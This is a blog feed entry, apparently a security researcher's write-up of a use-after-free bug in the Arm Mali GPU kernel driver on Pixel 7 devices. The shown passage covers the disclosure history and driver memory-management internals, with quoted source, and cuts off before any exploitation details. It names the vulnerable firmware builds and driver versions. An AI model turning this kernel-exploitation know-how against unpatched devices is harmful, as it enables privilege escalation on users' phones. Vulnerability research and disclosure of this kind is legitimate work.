<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://kyeojy.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://kyeojy.github.io/" rel="alternate" type="text/html" /><updated>2026-06-15T04:46:36+00:00</updated><id>https://kyeojy.github.io/feed.xml</id><title type="html">kyeojy | Security Discourse</title><subtitle>Musings of a random individual on cybersecurity matters</subtitle><author><name>kyeojy</name></author><entry><title type="html">An old Pixel rooting bug</title><link href="https://kyeojy.github.io/posts/mali-csf-exploit/" rel="alternate" type="text/html" title="An old Pixel rooting bug" /><published>2026-06-04T00:00:00+00:00</published><updated>2026-06-04T00:00:00+00:00</updated><id>https://kyeojy.github.io/posts/mali-csf-exploit</id><content type="html" xml:base="https://kyeojy.github.io/posts/mali-csf-exploit/"><![CDATA[<p>This post documents a Use-After-Free (UAF) issue in the Arm Mali GPU kernel driver that I discovered sometime in Oct-Nov 2022.</p>

<p>After finding the vulnerability, I spent some time researching how to exploit the issue, but was also busy with other work commitments. When I checked again in Jan 2023, I discovered that the bug had already been patched in Arm’s latest <code class="language-plaintext highlighter-rouge">r41p0</code> driver. However, the latest stable and developer preview firmware on Pixel 7/7 Pro devices still included a vulnerable version of the kernel driver, with the issue not being publicly disclosed yet. The fix was pending release in an upcoming version of the firmware that was still in development, so I decided to report the issue to Google and Arm, in case other vendors utilizing the latest Arm GPUs were also at risk from those targeting the patch gap. The issue reported to Google was <a href="https://issuetracker.google.com/u/1/issues/270529096">Issue 270529096</a>. I later found out that the bug is a variant of <a href="https://project-zero.issues.chromium.org/issues/42451508">the one reported by Google’s Project Zero team</a>, and that the root cause of the latter bug was already internally discovered by Arm prior to Project Zero’s report. The variant discovered by Project Zero was assigned <code class="language-plaintext highlighter-rouge">CVE-2022-42716</code>, while there is no public write-up or CVE assigned (as far as I am aware) for the variant this post will cover. I particularly enjoyed the entire process of discovering and exploiting this vulnerability, which I think warrants a post that shares the details. Note that the exact implementation details are discussed in the context of the Mali kernel drivers up to <code class="language-plaintext highlighter-rouge">r41p0</code>, and may or may not reflect the current state of the latest release. Exploitation of the bug on Pixel 7/7 Pro is discussed later in the post.</p>

<h1 id="background">Background</h1>

<p>The Arm Mali Command Stream Frontend (CSF) is an implementation in Arm Mali GPUs
that supersedes the older job manager (JM) framework to enable greater efficiency when
handling GPU workloads. It uses a combination of hardware and firmware to offload work that
was previously dependent on the CPU and is implemented in Arm Mali <code class="language-plaintext highlighter-rouge">G310</code>, <code class="language-plaintext highlighter-rouge">G510</code>, <code class="language-plaintext highlighter-rouge">G610</code>,
<code class="language-plaintext highlighter-rouge">G710</code>, <code class="language-plaintext highlighter-rouge">G615</code>, <code class="language-plaintext highlighter-rouge">G715</code> and <code class="language-plaintext highlighter-rouge">Immortalis-G715</code> (as of December 2022). These GPUs are present in
(at that time) newer generation devices such as Google Pixel 7/7 Pro, Honor 70 Pro+, Oppo Find N2 Flip, etc.
The exploit was tested to work on the Google Pixel 7 (global edition) factory images
<code class="language-plaintext highlighter-rouge">TD1A.220804.031</code>, <code class="language-plaintext highlighter-rouge">TQ1A.221205.011</code>, <code class="language-plaintext highlighter-rouge">TQ1A.230105.001.A2</code> and <code class="language-plaintext highlighter-rouge">TQ1A.230205.002</code> with no
additional configuration needed. This affects Arm Mali Bifrost and Valhall kernel drivers from
<code class="language-plaintext highlighter-rouge">r31p0</code> to <code class="language-plaintext highlighter-rouge">r40p0</code>.</p>

<p>Each process that uses the Mali kernel driver will initiate the creation of a new <code class="language-plaintext highlighter-rouge">struct
kbase_context</code> that holds metadata and information pertinent to the kernel’s GPU state for that
process. There is a <code class="language-plaintext highlighter-rouge">struct kbase_device</code> that represents an instance of the GPU platform
device and is accessible from every <code class="language-plaintext highlighter-rouge">kbase_context</code> for accessing device-wide data. The GPU
virtual address space is segmented into different virtual address (VA) zones, for example the
<code class="language-plaintext highlighter-rouge">KBASE_REG_ZONE_SAME_VA</code> zone (for memory allocations where the GPU virtual address will be
the same as the CPU virtual address), <code class="language-plaintext highlighter-rouge">KBASE_REG_ZONE_CUSTOM_VA</code> (for custom memory
allocations such as Just-In-Time (JIT) allocations) and <code class="language-plaintext highlighter-rouge">KBASE_REG_ZONE_EXEC_VA</code> (for the
GPU-executable allocations that don’t need the <code class="language-plaintext highlighter-rouge">SAME_VA</code> property).</p>

<h2 id="zones-and-regions">Zones and regions</h2>

<p>Each memory allocation made by the GPU is represented by a <code class="language-plaintext highlighter-rouge">struct kbase_va_region</code>, and
each virtual address zone is initialized as a region as well. The entire virtual address space is
represented by regions in a red black tree, with each zone being represented as a subtree. As
memory allocations are made in each zone, a new region is created that upon mapping into
GPU address space, either replaces a free region in the tree [1], is inserted before [2] or after an
existing free region [3], or it splits a previously free region in the tree [4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">kbase_insert_va_region_nolock</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">new_reg</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">at_reg</span><span class="p">,</span> <span class="n">u64</span> <span class="n">start_pfn</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">reg_rbtree</span> <span class="o">=</span> <span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">rbtree</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">new_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">=</span> <span class="n">start_pfn</span><span class="p">;</span>
	<span class="n">new_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">=</span> <span class="n">nr_pages</span><span class="p">;</span>

	<span class="cm">/* Regions are a whole use, so swap and delete old one. */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">==</span> <span class="n">start_pfn</span> <span class="o">&amp;&amp;</span> <span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">==</span> <span class="n">nr_pages</span><span class="p">)</span> <span class="p">{</span>  <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
		<span class="n">rb_replace_node</span><span class="p">(</span><span class="o">&amp;</span><span class="p">(</span><span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">rblink</span><span class="p">),</span> <span class="o">&amp;</span><span class="p">(</span><span class="n">new_reg</span><span class="o">-&gt;</span><span class="n">rblink</span><span class="p">),</span>
								<span class="n">reg_rbtree</span><span class="p">);</span>
		<span class="n">kfree</span><span class="p">(</span><span class="n">at_reg</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="cm">/* New region replaces the start of the old one, so insert before. */</span>
	<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">==</span> <span class="n">start_pfn</span><span class="p">)</span> <span class="p">{</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
		<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">+=</span> <span class="n">nr_pages</span><span class="p">;</span>
		<span class="n">KBASE_DEBUG_ASSERT</span><span class="p">(</span><span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">&gt;=</span> <span class="n">nr_pages</span><span class="p">);</span>
		<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">-=</span> <span class="n">nr_pages</span><span class="p">;</span>

		<span class="n">kbase_region_tracker_insert</span><span class="p">(</span><span class="n">new_reg</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="cm">/* New region replaces the end of the old one, so insert after. */</span>
	<span class="k">else</span> <span class="k">if</span> <span class="p">((</span><span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">+</span> <span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span><span class="p">)</span> <span class="o">==</span> <span class="p">(</span><span class="n">start_pfn</span> <span class="o">+</span> <span class="n">nr_pages</span><span class="p">))</span> <span class="p">{</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
		<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">-=</span> <span class="n">nr_pages</span><span class="p">;</span>

		<span class="n">kbase_region_tracker_insert</span><span class="p">(</span><span class="n">new_reg</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="cm">/* New region splits the old one, so insert and create new */</span>
	<span class="k">else</span> <span class="p">{</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
		<span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">new_front_reg</span><span class="p">;</span>

		<span class="n">new_front_reg</span> <span class="o">=</span> <span class="n">kbase_alloc_free_region</span><span class="p">(</span><span class="n">reg_rbtree</span><span class="p">,</span>
				<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span><span class="p">,</span>
				<span class="n">start_pfn</span> <span class="o">-</span> <span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span><span class="p">,</span>
				<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KBASE_REG_ZONE_MASK</span><span class="p">);</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">new_front_reg</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span> <span class="o">-=</span> <span class="n">nr_pages</span> <span class="o">+</span> <span class="n">new_front_reg</span><span class="o">-&gt;</span><span class="n">nr_pages</span><span class="p">;</span>
			<span class="n">at_reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">=</span> <span class="n">start_pfn</span> <span class="o">+</span> <span class="n">nr_pages</span><span class="p">;</span>

			<span class="n">kbase_region_tracker_insert</span><span class="p">(</span><span class="n">new_front_reg</span><span class="p">);</span>
			<span class="n">kbase_region_tracker_insert</span><span class="p">(</span><span class="n">new_reg</span><span class="p">);</span>
		<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
			<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="memory-management-and-allocations-in-the-gpu-driver">Memory management and allocations in the GPU driver</h2>

<p>Some memory management details have been covered in this great write-up by Man Yue Mo
<a href="https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/">here</a> and I would be remiss to not reiterate some of them. GPU memory must first be allocated,
using the ioctl call <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_ALLOC</code>, that triggers the function <code class="language-plaintext highlighter-rouge">kbase_mem_alloc</code>. Flags
such as <code class="language-plaintext highlighter-rouge">BASE_MEM_PROT_CPU_RD</code> (allowing CPU read access) and <code class="language-plaintext highlighter-rouge">BASE_MEM_PROT_GPU_WR</code>
(allowing GPU write access) can be set for the region, which determine its properties. Each region contains a <code class="language-plaintext highlighter-rouge">gpu_alloc</code> and <code class="language-plaintext highlighter-rouge">cpu_alloc</code> member, each of which is a <code class="language-plaintext highlighter-rouge">struct
kbase_mem_phy_alloc</code> that tracks information regarding the region’s backing physical pages for
the CPU or GPU. For 64-bit applications that use the driver, the CSF implementation forces the
<code class="language-plaintext highlighter-rouge">KCTX_FORCE_SAME_VA</code> flag on the <code class="language-plaintext highlighter-rouge">kbase_context</code>. This enforces the <code class="language-plaintext highlighter-rouge">BASE_MEM_SAME_VA</code> flag
for the memory allocation, ensuring that the region has the same virtual address on both the
GPU and CPU.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="nf">kbase_create_context</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
		<span class="n">bool</span> <span class="n">is_compat</span><span class="p">,</span>
		<span class="n">base_context_create_flags</span> <span class="k">const</span> <span class="n">flags</span><span class="p">,</span>
		<span class="kt">unsigned</span> <span class="kt">long</span> <span class="k">const</span> <span class="n">api_version</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="k">const</span> <span class="n">filp</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
<span class="cp">#if defined(CONFIG_64BIT)
</span>	<span class="k">else</span>
		<span class="n">kbase_ctx_flag_set</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">KCTX_FORCE_SAME_VA</span><span class="p">);</span>
<span class="cp">#endif </span><span class="cm">/* defined(CONFIG_64BIT) */</span><span class="cp">
</span>	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">kbase_api_mem_alloc_ex</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
				  <span class="k">union</span> <span class="n">kbase_ioctl_mem_alloc_ex</span> <span class="o">*</span><span class="n">alloc_ex</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">((</span><span class="o">!</span><span class="n">kbase_ctx_flag</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">KCTX_COMPAT</span><span class="p">))</span> <span class="o">&amp;&amp;</span>
			<span class="n">kbase_ctx_flag</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">KCTX_FORCE_SAME_VA</span><span class="p">))</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">gpu_executable</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">fixed_or_fixable</span><span class="p">)</span>
			<span class="n">flags</span> <span class="o">|=</span> <span class="n">BASE_MEM_SAME_VA</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>For <code class="language-plaintext highlighter-rouge">BASE_MEM_SAME_VA</code> allocations, <code class="language-plaintext highlighter-rouge">kbase_mem_alloc</code> eventually returns a cookie that can be
used in a call to <code class="language-plaintext highlighter-rouge">mmap</code> to map the region into the GPU page tables.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="nf">kbase_mem_alloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="n">u64</span> <span class="n">va_pages</span><span class="p">,</span> <span class="n">u64</span> <span class="n">commit_pages</span><span class="p">,</span>
				<span class="n">u64</span> <span class="n">extension</span><span class="p">,</span> <span class="n">u64</span> <span class="o">*</span><span class="n">flags</span><span class="p">,</span> <span class="n">u64</span> <span class="o">*</span><span class="n">gpu_va</span><span class="p">,</span>
				<span class="k">enum</span> <span class="n">kbase_caller_mmu_sync_info</span> <span class="n">mmu_sync_info</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="cm">/* mmap needed to setup VA? */</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">BASE_MEM_SAME_VA</span><span class="p">)</span> <span class="p">{</span>
		<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">cookie</span><span class="p">,</span> <span class="n">cookie_nr</span><span class="p">;</span>

		<span class="cm">/* Bind to a cookie */</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">bitmap_empty</span><span class="p">(</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">cookies</span><span class="p">,</span> <span class="n">BITS_PER_LONG</span><span class="p">))</span> <span class="p">{</span>
			<span class="n">dev_err</span><span class="p">(</span><span class="n">dev</span><span class="p">,</span> <span class="s">"No cookies available for allocation!"</span><span class="p">);</span>
			<span class="n">kbase_gpu_vm_unlock</span><span class="p">(</span><span class="n">kctx</span><span class="p">);</span>
			<span class="k">goto</span> <span class="n">no_cookie</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="cm">/* return a cookie */</span>
		<span class="n">cookie_nr</span> <span class="o">=</span> <span class="n">find_first_bit</span><span class="p">(</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">cookies</span><span class="p">,</span> <span class="n">BITS_PER_LONG</span><span class="p">);</span>
		<span class="n">bitmap_clear</span><span class="p">(</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">cookies</span><span class="p">,</span> <span class="n">cookie_nr</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
		<span class="n">BUG_ON</span><span class="p">(</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">pending_regions</span><span class="p">[</span><span class="n">cookie_nr</span><span class="p">]);</span>
		<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">pending_regions</span><span class="p">[</span><span class="n">cookie_nr</span><span class="p">]</span> <span class="o">=</span> <span class="n">reg</span><span class="p">;</span>

		<span class="cm">/* relocate to correct base */</span>
		<span class="n">cookie</span> <span class="o">=</span> <span class="n">cookie_nr</span> <span class="o">+</span> <span class="n">PFN_DOWN</span><span class="p">(</span><span class="n">BASE_MEM_COOKIE_BASE</span><span class="p">);</span>
		<span class="n">cookie</span> <span class="o">&lt;&lt;=</span> <span class="n">PAGE_SHIFT</span><span class="p">;</span>

		<span class="o">*</span><span class="n">gpu_va</span> <span class="o">=</span> <span class="p">(</span><span class="n">u64</span><span class="p">)</span> <span class="n">cookie</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The physical pages that back the region are allocated with <code class="language-plaintext highlighter-rouge">kbase_alloc_phy_pages_helper</code>,
and by default 2MB allocations are disabled on the Mali GPU for Pixel 7/7 Pro, so
<code class="language-plaintext highlighter-rouge">kbase_mem_pool_alloc_pages</code> will be called to allocate the pages from the <code class="language-plaintext highlighter-rouge">kbase_context</code>
memory pool by default.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_alloc_phy_pages_helper</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_phy_alloc</span> <span class="o">*</span><span class="n">alloc</span><span class="p">,</span>
		<span class="kt">size_t</span> <span class="n">nr_pages_requested</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
<span class="cp">#ifdef CONFIG_MALI_2MB_ALLOC
</span>	<span class="p">...</span>
<span class="cp">#endif
</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">nr_left</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">res</span> <span class="o">=</span> <span class="n">kbase_mem_pool_alloc_pages</span><span class="p">(</span>
			<span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">mem_pools</span><span class="p">.</span><span class="n">small</span><span class="p">[</span><span class="n">alloc</span><span class="o">-&gt;</span><span class="n">group_id</span><span class="p">],</span>
			<span class="n">nr_left</span><span class="p">,</span> <span class="n">tp</span><span class="p">,</span> <span class="nb">false</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">res</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span>
			<span class="k">goto</span> <span class="n">alloc_failed</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">kbase_mem_pool_alloc_pages</code> attempts to allocate from the current <code class="language-plaintext highlighter-rouge">kbase_context</code> memory
pool first [1] and if there are insufficient pages, it tries to allocate from that pool’s next memory pool [2].
The next memory pool of every <code class="language-plaintext highlighter-rouge">kbase_context</code> memory pool will be the <code class="language-plaintext highlighter-rouge">kbase_device</code>
memory pool of the same <code class="language-plaintext highlighter-rouge">group_id</code> (i.e. based on the snippet of code above, the next pool will be
<code class="language-plaintext highlighter-rouge">kctx-&gt;kbdev-&gt;mem_pools.small[alloc-&gt;group_id]</code>). If the next pool also has insufficient
pages, it will try to allocate from the kernel itself [3]. There are a total of 16 <code class="language-plaintext highlighter-rouge">group_id</code>s ranging from
0 to 15. This corresponds to the value of <code class="language-plaintext highlighter-rouge">MEMORY_GROUP_MANAGER_NR_GROUPS</code>. The memory pools are meant as an optimization to reuse pages that were allocated from the kernel before, to avoid the more costly kernel allocation and freeing routines.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_mem_pool_alloc_pages</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_4k_pages</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">pages</span><span class="p">,</span> <span class="n">bool</span> <span class="n">partial_allowed</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="cm">/* Get pages from this pool */</span>
	<span class="n">kbase_mem_pool_lock</span><span class="p">(</span><span class="n">pool</span><span class="p">);</span>
	<span class="n">nr_from_pool</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">nr_pages_internal</span><span class="p">,</span> <span class="n">kbase_mem_pool_size</span><span class="p">(</span><span class="n">pool</span><span class="p">));</span>
	<span class="k">while</span> <span class="p">(</span><span class="n">nr_from_pool</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
		<span class="kt">int</span> <span class="n">j</span><span class="p">;</span>
		<span class="n">p</span> <span class="o">=</span> <span class="n">kbase_mem_pool_remove_locked</span><span class="p">(</span><span class="n">pool</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">!=</span> <span class="n">nr_4k_pages</span> <span class="o">&amp;&amp;</span> <span class="n">pool</span><span class="o">-&gt;</span><span class="n">next_pool</span><span class="p">)</span> <span class="p">{</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
		<span class="cm">/* Allocate via next pool */</span>
		<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_mem_pool_alloc_pages</span><span class="p">(</span><span class="n">pool</span><span class="o">-&gt;</span><span class="n">next_pool</span><span class="p">,</span>
				<span class="n">nr_4k_pages</span> <span class="o">-</span> <span class="n">i</span><span class="p">,</span> <span class="n">pages</span> <span class="o">+</span> <span class="n">i</span><span class="p">,</span> <span class="n">partial_allowed</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="cm">/* Get any remaining pages from kernel */</span>
		<span class="k">while</span> <span class="p">(</span><span class="n">i</span> <span class="o">!=</span> <span class="n">nr_4k_pages</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">p</span> <span class="o">=</span> <span class="n">kbase_mem_alloc_page</span><span class="p">(</span><span class="n">pool</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
			<span class="p">...</span>
		<span class="p">}</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><a id="free_phy_pages_helper"></a>Similarly when freeing pages, the driver uses <code class="language-plaintext highlighter-rouge">kbase_free_phy_pages_helper</code> which calls
<code class="language-plaintext highlighter-rouge">kbase_mem_pool_free_pages</code> [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_free_phy_pages_helper</span><span class="p">(</span>
	<span class="k">struct</span> <span class="n">kbase_mem_phy_alloc</span> <span class="o">*</span><span class="n">alloc</span><span class="p">,</span>
	<span class="kt">size_t</span> <span class="n">nr_pages_to_free</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">while</span> <span class="p">(</span><span class="n">nr_pages_to_free</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">is_huge_head</span><span class="p">(</span><span class="o">*</span><span class="n">start_free</span><span class="p">))</span> <span class="p">{</span>
			<span class="cm">/* This is a 2MB entry, so free all the 512 pages that
			 * it points to
			 */</span>
			<span class="p">...</span>
		<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">if_partial</span><span class="p">(</span><span class="o">*</span><span class="n">start_free</span><span class="p">))</span> <span class="p">{</span>
			<span class="p">...</span>
		<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
			<span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">local_end_free</span><span class="p">;</span>

			<span class="n">local_end_free</span> <span class="o">=</span> <span class="n">start_free</span><span class="p">;</span>
			<span class="k">while</span> <span class="p">(</span><span class="n">nr_pages_to_free</span> <span class="o">&amp;&amp;</span>
				<span class="o">!</span><span class="n">is_huge</span><span class="p">(</span><span class="o">*</span><span class="n">local_end_free</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
				<span class="o">!</span><span class="n">is_partial</span><span class="p">(</span><span class="o">*</span><span class="n">local_end_free</span><span class="p">))</span> <span class="p">{</span>
				<span class="n">local_end_free</span><span class="o">++</span><span class="p">;</span>
				<span class="n">nr_pages_to_free</span><span class="o">--</span><span class="p">;</span>
			<span class="p">}</span>
			<span class="n">kbase_mem_pool_free_pages</span><span class="p">(</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
				<span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">mem_pools</span><span class="p">.</span><span class="n">small</span><span class="p">[</span><span class="n">alloc</span><span class="o">-&gt;</span><span class="n">group_id</span><span class="p">],</span>
				<span class="n">local_end_free</span> <span class="o">-</span> <span class="n">start_free</span><span class="p">,</span>
				<span class="n">start_free</span><span class="p">,</span>
				<span class="n">syncback</span><span class="p">,</span>
				<span class="n">reclaimed</span><span class="p">);</span>
			<span class="n">freed</span> <span class="o">+=</span> <span class="n">local_end_free</span> <span class="o">-</span> <span class="n">start_free</span><span class="p">;</span>
			<span class="n">start_free</span> <span class="o">+=</span> <span class="n">local_end_free</span> <span class="o">-</span> <span class="n">start_free</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><a id="pool_free"></a>It tries to free pages to a <code class="language-plaintext highlighter-rouge">kbase_context</code> mem_pool [1] and if there is insufficient capacity it spills
over to the next pool [2], which is the <code class="language-plaintext highlighter-rouge">kbase_device</code> pool of the same <code class="language-plaintext highlighter-rouge">group_id</code>. If there are still
remaining pages or the next pool is full, the pages are freed back to the kernel [3].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kbase_mem_pool_free_pages</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">pages</span><span class="p">,</span> <span class="n">bool</span> <span class="n">dirty</span><span class="p">,</span> <span class="n">bool</span> <span class="n">reclaimed</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">reclaimed</span><span class="p">)</span> <span class="p">{</span>
		<span class="cm">/* Add to this pool */</span>
		<span class="n">nr_to_pool</span> <span class="o">=</span> <span class="n">kbase_mem_pool_capacity</span><span class="p">(</span><span class="n">pool</span><span class="p">);</span>
		<span class="n">nr_to_pool</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">nr_pages</span><span class="p">,</span> <span class="n">nr_to_pool</span><span class="p">);</span>

		<span class="n">kbase_mem_pool_add_array</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="n">nr_to_pool</span><span class="p">,</span> <span class="n">pages</span><span class="p">,</span> <span class="nb">false</span><span class="p">,</span> <span class="n">dirty</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>

		<span class="n">i</span> <span class="o">+=</span> <span class="n">nr_to_pool</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">!=</span> <span class="n">nr_pages</span> <span class="o">&amp;&amp;</span> <span class="n">next_pool</span><span class="p">)</span> <span class="p">{</span>
			<span class="cm">/* Spill to next pool (may overspill) */</span>
			<span class="n">nr_to_pool</span> <span class="o">=</span> <span class="n">kbase_mem_pool_capacity</span><span class="p">(</span><span class="n">next_pool</span><span class="p">);</span>
			<span class="n">nr_to_pool</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">nr_pages</span> <span class="o">-</span> <span class="n">i</span><span class="p">,</span> <span class="n">nr_to_pool</span><span class="p">);</span>

